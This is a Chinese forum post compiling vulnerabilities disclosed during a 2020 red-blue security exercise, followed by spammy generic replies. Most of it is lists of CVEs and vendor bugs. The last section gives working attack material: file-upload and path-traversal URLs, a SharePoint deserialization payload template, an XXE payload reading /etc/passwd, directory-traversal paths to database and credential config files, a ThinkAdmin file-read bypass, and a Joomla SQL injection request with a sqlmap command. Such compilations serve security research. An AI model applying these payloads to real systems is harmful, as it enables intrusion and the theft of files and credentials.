天涯论坛

 找回密码
 立即注册
搜索
查看: 15|回复: 3

2020HW时期颁布漏洞总结:深信服,绿盟,天融信,泛微云显现漏洞,害处级别:危急

[复制链接]

3070

主题

3万

回帖

9915万

积分

论坛元老

Rank: 8Rank: 8

积分
99158931
发表于 2024-10-10 04:17:53 | 显示全部楼层 |阅读模式

2020年HW已结束,博主汇总了HW时期颁布的漏洞,供各位红蓝双方安全科研运用

9月11日-9月23日漏洞(来自补天)

1.深信服EDR某处命令执行漏洞,害处级别:危急

2.深信服SSL VPN 远程代码执行漏洞,害处级别:危急

3.绿盟UTS综合威胁探针信息泄密漏洞,害处级别:危急,官方已发布补丁

4.Apache DolphinScheduler远程代码执行漏洞(CVE-2020-11974),害处级别:危急,官方已发布补丁

5.Apache Cocoon security vulnerability (CVE-2020-11991),害处级别:危急,官方已发布补丁

6.天融信TopApp-LB 负载平衡系统SQL注入漏洞,害处级别:高危

7.用友GRP-u8 命令执行漏洞,害处级别:危急

8.泛微云桥任意文件读取漏洞,害处级别:高危

9.齐治堡垒机前台远程命令执行漏洞,害处级别:危急

10.联软准入系统任意文件上传漏洞EXP公开,害处级别:危急

11.PAN-OS远程代码执行漏洞,害处级别:危急

12.天融信NGFW下一代防火墙漏洞辟谣,害处级别:无

13.山石网科下一代防火墙SG-6000漏洞辟谣,害处级别:无

14.Nagios 命令执行漏洞,害处级别:危急

15.Weblogic远程命令执行漏洞,害处级别:危急

16.IE浏览器远程代码执行漏洞,害处级别:高危

17.网御星云VPN老版本存在漏洞,害处级别:高危

18.微软NetLogon 权限提高漏洞,害处级别:危急

19.致远A8文件上传漏洞,害处级别:危急

20.致远A8反序列化漏洞,害处级别:危急

21.深信服VPN 任意用户添加漏洞,害处级别:危急

22.拓尔思TRSWAS5.0文件读取漏洞,害处级别:中危

23.Wordpress File-manager任意文件上传,害处级别:高危

24.Apache DolphinScheduler权限提高漏洞(CVE-2020-13922) ,害处级别:高危

25.致远OA任意文件写入漏洞,害处级别:危急

26.Microsoft Exchange远程代码执行漏洞通告,害处级别:危急

27.Spectrum Protect Plus任意代码执行漏洞,害处级别:高危

28.深信服 SSL VPN Nday - Pre Auth 任意秘码重置漏洞,害处级别:高危

29.深信服 SSL VPN 修改绑定手机号码漏洞,等级:高危

30.McAfee Web Gateway多个高危漏洞,害处级别:高危

31.Yii2框架反序列化远程命令执行漏洞,害处级别:高危

32.微软 SQL Server 报表服务远程代码执行漏洞(CVE-2020-0618),害处级别:高危

33.Spring框架RFD攻击漏洞通告,害处级别:中危

34.VMware Fusion 权限提高漏洞(CVE-2020-3980),害处级别:中危

35.Aruba Clearpass远程命令执行漏洞(CVE-2020-7115),害处级别:高危

36.Yii2框架反序列化远程命令执行漏洞二次更新,害处级别:高危

37.Apache Superset远程代码执行漏洞(CVE-2020-13948)害处级别:高危

38. Fastadmin文件上传漏洞,害处级别:高危

39.WebSphere Application Server XXE 漏洞,害处级别:高危

40.建文工程项目管理软件任意文件上传漏洞,害处级别:高危

来自白泽Sec整理的漏洞列表

1.VMware Fusion cve-2020-3980权限提高

2.Apache Cocoon security vulnerability cve-2020-11991

3.Spring框架RFD(文件下载)

4.CVE-2020-0618-SQLServer报表服务远程代码执行漏洞

5.CVE-2020-7115-Aruba Clearpass远程代码执行漏洞

6.CVE-2020-15148-Yii 2框架反序列化远程命令执漏洞

7.CVE-2020-13948-Apache Superset 远程代码执行

8.深信服 SSL VPN Nday - Pre Auth 修改绑定手机

9.深信服 SSL VPN Nday - Pre Auth 任意秘码重置

10.CVE-2020-1472-NetLogon特权提高漏洞

11.CVE-2020-2040-PAN-OS远程代码执行漏洞

12.ThinkPHP3.x注入漏洞

13.用友GRP-u8 SQL注入

14.泛微云桥任意文件读取

15.联软准入文件上传漏洞

16.奇治堡垒机 Python代码注入

17.用友GRP-u8 命令执行漏洞

18.Nagios命令执行

19.Weblogic远程命令执行

20.网御星云VPN老版本漏洞

21.拓尔思5.0文件读取漏洞

22.wordpress File-manager任意文件上传

23.天融信TOPApp-LB负载平衡SQL注入漏洞

24.绿盟UTS综合威胁探针管理员任意登录

25.深信服EDR3.2.21远程代码执行

26.CVE-2020-11974-Apache DolphinScheduler远程执行代码漏洞

27.CVE-2020-11107-XAMPP任意命令执行漏洞

28.CVE-2020-16875-Exchange远程代码执行漏洞

29.深信服EDR远程代码 执行漏洞

30.CVE-2020-24616-Jackson 多个反序列化安全漏洞

31.宝塔面板888端口pma未授权拜访

32.深信服 EDR 任意用户登录漏洞

33.泛微e-cology某版本存在RCE漏洞

34.CVE-2020-13933-Apache Shiro 权限绕过漏洞

35.通达OA11.6未授权远程代码执行漏洞

36.深信服EDR远程命令执行漏洞

37.天融信数据防泄漏系统未授权修改管理员秘码

38.CVE-2020-11995-Apache Dubbo远程代码执行漏洞

39.PHPCMS v9全版本前台RCE

40.CVE-2019-0230-Struts2远程代码执行漏洞

41.CVE-2020-13699-TeamViewer全版本无秘码连接

42.CVE-2020-13921-Apache SkyWalking SQL注入漏洞

43.CVE-2020-13925-Apache Kylin 远程命令执行漏洞

44.CVE-2020-1350-Windows DNS Server远程代码执行漏洞

45.CVE-2020-14645-Weblogic命令执行漏洞

46.CVE-2020-8194-Citrix代码注入等系列漏洞

47.CVE-2020-10977-Gitlab CE/EE任意文件读取/RCE

48.CVE-2020-8193-Citrix ADC远程代码执行

49.CVE-2020-5902-F5 BIG-IP TMUI 远程代码执行漏洞

50.CVE-2020-9498-Apache Guacamole RDP 远程代码执行漏洞

51.CVE-2020-9480-Apache Spark远程代码执行漏洞

52.CVE-2020-11989-Apache Shiro身份验证绕过漏洞

53.CVE-2020-1948-Apache Dubbo反序列化漏洞

54.CVE-2020-9483-Apache SkyWalkingSQL注入漏洞

55.CVE-2020-4450-WebSphere远程代码执行漏洞

56.用友NC6.5反序列化漏洞

57.CVE-2020-3956-VMware Cloud Director 代码注入漏洞

58.CVE-2020-5410-Spting-Cloud-Config-Server目录遍历

59.CVE-2020-1956-Apache Kylin远程命令执行漏洞

60.Fastjson <= 1.2.68 远程命令执行漏洞

61.CVE-2020-9484-Apache Tomcat session持久化远程代码执行漏洞

62.vBulletin 5.6.1 SQL注入漏洞

63.CVE-2020-11651-SaltStack认证绕过漏洞/命令执行

64.CVE-2020-11652-SaltStack目录遍历漏洞

65.通达OA11.4存在越权登录漏洞

66.CVE-2020-4362-WebSphere远程代码执行漏洞

67.通达OA11.5存在多处SQL注入漏洞

68.CVE-2020-1947-ShardingShpere命令执行漏洞

69.通达OA文件包括漏洞和SQL注入漏洞

70.CVE-2020-0796 SMBV3远程命令执行漏洞

71.CVE-2020-0688-Exchange远程代码执行漏洞

72.CVE-2020-1938-Apache Tomcat文件包括漏洞

73.CVE-2019-17564-Apache Dubbo反序列化漏洞

78.CVE-2020-0601-签名伪造

79.ThinkPHP6 任意文件操作漏洞

80.CVE-2020-2551-Weblogic反序列化漏洞

81.CVE-2020-2555-Weblogic反序列化漏洞

82.CVE-2020-9951 Apple Safari 远程执行代码漏洞

83.CVE-2020-9992 Apple Xcode 远程命令执行漏洞

84.Citrix Systems 多款制品存在安全漏洞

85.CVE-2020-8245

86.CVE-2020-8246

87.CVE-2020-8247

88.CVE-2020-11861 KM03709900 操作代理,本地特权漏洞

89.CVE-2020-11699 SpamTitan 7.07 多个RCE漏洞

90.CVE-2020-11699

91.CVE-2020-11699

92.CVE-2020-11699

93.CVE-2020-7115 Aruba Clearpass 远程命令执行漏洞

94.CVE-2020-0688 Microsoft Exchange Server远程代码执行漏洞

95.CVE-2020-1035 Microsoft Internet Explorer VBScript Engine 远程代码执行漏洞

96.CVE-2020-1048 Microsoft Windows Print Spooler 安全漏洞

97.CVE-2020-1092 Microsoft Internet Explorer 远程代码执行漏洞

98.CVE-2020-16875 Microsoft Exchange远程代码执行漏洞

99.CVE-2020-8028 SUSE拜访掌控错误漏洞

100.CVE-2020-25751 Joomla paGO Commerce 2.5.9.0 SQL 注入

101.CVE-2020-16860 Microsoft Dynamics 365远程代码执行漏洞

102.CVE-2020-15920 Mida Solutions eFramework ajaxreq.php 命令注入漏洞

103.CVE-2020-12109 TP-Link云摄像头 NCXXX系列存在命令注入漏洞

104.CVE-2020-5421 SPRING FRAMEWORK反射型文件下载漏洞

105.CVE-2020-25790 Typesetter CMS任意文件上传

106.CVE-2020-4643 IBM WebSphere 存在XXE外边实体注入漏洞

107.webTareas存在多个安全漏洞

108.CNNVD-202009-1177

109.CNNVD-202009-1176

110.CNNVD-202009-1175

112.CVE-2020-1350 Microsoft Windows Server DNS Server 缓冲区错误漏洞

113.PHPCMS V9 存在RCE漏洞

114.QEMU-KVM越界读写漏洞

115.Cochip无线路由器绕过认证泄密账号秘码漏洞

116.CVE-2020-4450 WebSphere远程代码执行漏洞

117.CVE-2020-13933 Apache shiro权限绕过漏洞

来自IDLab整理的漏洞详情

01.联软任意文件上传漏洞已知存在漏洞的url如下:http://IP:80/uai/newDevRegist/updateDevUploadinfo.htm(仅有201904-1SP起才存在该漏洞)http://IP:80/uai/download/uploadfileToPath.htm(受影响的版本都存在该漏洞)http://IP:80/uai/newDevRegist/newDevRegist/newDevRegist/..;/..;/updateDevUploadinfo.htm(仅有201904-1SP起才存在该漏洞)http://IP:80/uai/download/download/download/..;/..;/uploadfileToPath.htm (受影响的版本都存在该漏洞)02.网瑞达资源拜访掌控系统命令执行漏洞手工检测:运用普通账户登录进入主界面,在输入框中输入1.1.1.1@127.0.0.1:8860并点击立即页面若包括pong字符串则存在漏洞。br03.Exchange Server 远程代码执行漏洞前提:需要一个Exchange用户账号。就能在Exchange服务器上执行任意命令POC位置:https://srcincite.io/pocs/cve-2020-16875.py.txthttps://srcincite.io/pocs/cve-2020-16875.ps1.txtbr04.SharePoint远程代码执行漏洞

1.运用ysoserial工具生成payload

2.将生成的payload拼接到poc

3.服务器iis主进程中起步了calc.exe

pox.xml

<DataSet> <xs:schema xmlns="" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:msdata="urn:schemas-microsoft-com:xml-msdata" id="somedataset"> <xs:element name="somedataset" msdata:IsDataSet="true" msdata:UseCurrentLocale="true"> <xs:complexType> <xs:choice minOccurs="0" maxOccurs="unbounded"> <xs:element name="Exp_x0020_Table"> <xs:complexType> <xs:sequence> <xs:element name="pwn" msdataataType="System.Data.Services.Internal.ExpandedWrapper`2[[System.Web.UI.LosFormatter, System.Web, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" type="xs:anyType" minOccurs="0"/> </xs:sequence> </xs:complexType> </xs:element> </xs:choice> </xs:complexType> </xs:element> </xs:schema> <diffgr:diffgram xmlns:msdata="urn:schemas-microsoft-com:xml-msdata" xmlns:diffgr="urn:schemas-microsoft-com:xml-diffgram-v1"> <somedataset> <Exp_x0020_Table diffgr:id="Exp Table1" msdata:rowOrder="0" diffgr:hasChanges="inserted"> <pwn xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"> <ExpandedElement/> <ProjectedProperty0> <MethodName>Deserialize</MethodName> <MethodParameters> <anyType xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xsi:type="xsd:string">这儿放payload</anyType> </MethodParameters> <ObjectInstance xsi:type="LosFormatter"></ObjectInstance> </ProjectedProperty0> </pwn> </Exp_x0020_Table> </somedataset> </diffgr:diffgram></DataSet>05.Apache Cocoon XML注入

漏洞利用要求有限必须是apacheCocoon且运用了StreamGenerator,便是说只要传输的数据被解析就能够实现了。

<!--?xml version="1.0" ?--><!DOCTYPE replace [<!ENTITY ent SYSTEM "file:///etc/passwd"> ]><userInfo><firstName>John</firstName> <lastName>&ent;</lastName></userInfo>br06.Horde Groupware Webmail Edition 远程命令执行

源自: https://srcincite.io/pocs/zdi-20-1051.py.txt

07.泛微云桥任意文件读取升级玩法

1、简单说说昨天泛微云桥的报告,输入文件路径->读取文件内容,咱们读了一下代码后发掘这还能读取文件目录。

2、参数不填写绝对路径写进文本内容便是当前的目录,产生了一个新的漏洞 “目录遍历”

/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///D:/&fileExt=txt

3、目录遍历+文件读取,咱们能做的事情就非常多了,例如读取管理员在桌面留下的秘码文件、数据库配置文件、nginx代理配置、拜访日志、D盘迅雷下载。

d://ebridge//tomcat//webapps//ROOT//WEB-INF//classes//init.propertiesd:/OA/tomcat8/webapps/OAMS/WEB-INF/classes/dbconfig.properties 泛微OA数据库br

08.某讯云WAF中修改XFF头会引起IP封禁策略失效

攻击者真实IP被封禁的状况下,还是能够经过修改XFF头后继续对网站进行拜访,即IP封禁办法会无效。

09.ThinkAdmin v6 未授权列目录/任意文件读取

参考:https://github.com/zoujingli/ThinkAdmin/issues/244

任意文件读取exp:http://think.admin/ThinkAdmin/public/admin.html?s=admin/api.Update/nodePOST:rules=["/"]能够运用../来进行目录穿越:rules=["../../../"]br

有一个准许的列表:configpublic/staticpublic/router.phppublic/index.phpapp/adminapp/wechat便是说$name必须要不是database.php且要在准许列表内的文件才可够被读取,先绕过安全列表的限制,例如读取根目录的1.txt,只需要传入:public/static/../../1.txt而database.php的限制在Linux下应该是没办法绕过的,然则在Windows下能够透过"来替换.,便是传入:public/static/../../config/database"php对应encode()后的结果为:34392q302x2r1b37382p382x2r1b1a1a1b1a1a1b2r33322u2x2v1b2s2p382p2q2p372t0y342w34br

10.Joomla! paGO Commerce 2.5.9.0 存在SQL 注入POST /joomla/administrator/index.php?option=com_pago&view=comments HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 163Origin: http://localhostConnection: closeReferer: http://localhost/joomla/administrator/index.php?option=com_pago&view=commentsCookie: 4bde113dfc9bf88a13de3b5b9eabe495=sp6rp5mqnihh2i323r57cvesoe; crisp-client%2Fsession%2F0ac26dbb-4c2f-490e-88b2-7292834ac0e9=session_a9697dd7-152d-4b1f-a324-3add3619b1e1Upgrade-Insecure-Requests: 1filter_search=&limit=10&filter_published=1&task=&controller=comments&boxchecked=0&filter_order=id&filter_order_Dir=desc&5a672ab408523f68032b7bdcd7d4bb5c=1br

Sqlmap poc

sqlmap -r pago --dbs --risk=3 --level=5--random-agent -p filter_publishedbr买华为云服务器 请点击原文吧!




上一篇:fastapi-admin实现
下一篇:护网漏洞汇总②
回复

使用道具 举报

3125

主题

3万

回帖

9910万

积分

论坛元老

Rank: 8Rank: 8

积分
99108619
发表于 2024-10-18 15:48:48 | 显示全部楼层
你的见解真是独到,让我受益匪浅。
回复

使用道具 举报

3047

主题

3万

回帖

9606万

积分

论坛元老

Rank: 8Rank: 8

积分
96065852
发表于 2024-10-20 14:24:31 | 显示全部楼层
你的话语真是温暖如春,让我心生感激。
回复

使用道具 举报

2996

主题

3万

回帖

9910万

积分

论坛元老

Rank: 8Rank: 8

积分
99109194
发表于 昨天 23:07 | 显示全部楼层
感谢你的精彩评论,带给我新的思考角度。
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

站点统计|Archiver|手机版|小黑屋|天涯论坛 ( 非经营性网站 )|网站地图

GMT+8, 2024-11-23 08:07 , Processed in 0.124422 second(s), 21 queries .

Powered by Discuz! X3.4

Copyright © 2001-2023, Tencent Cloud.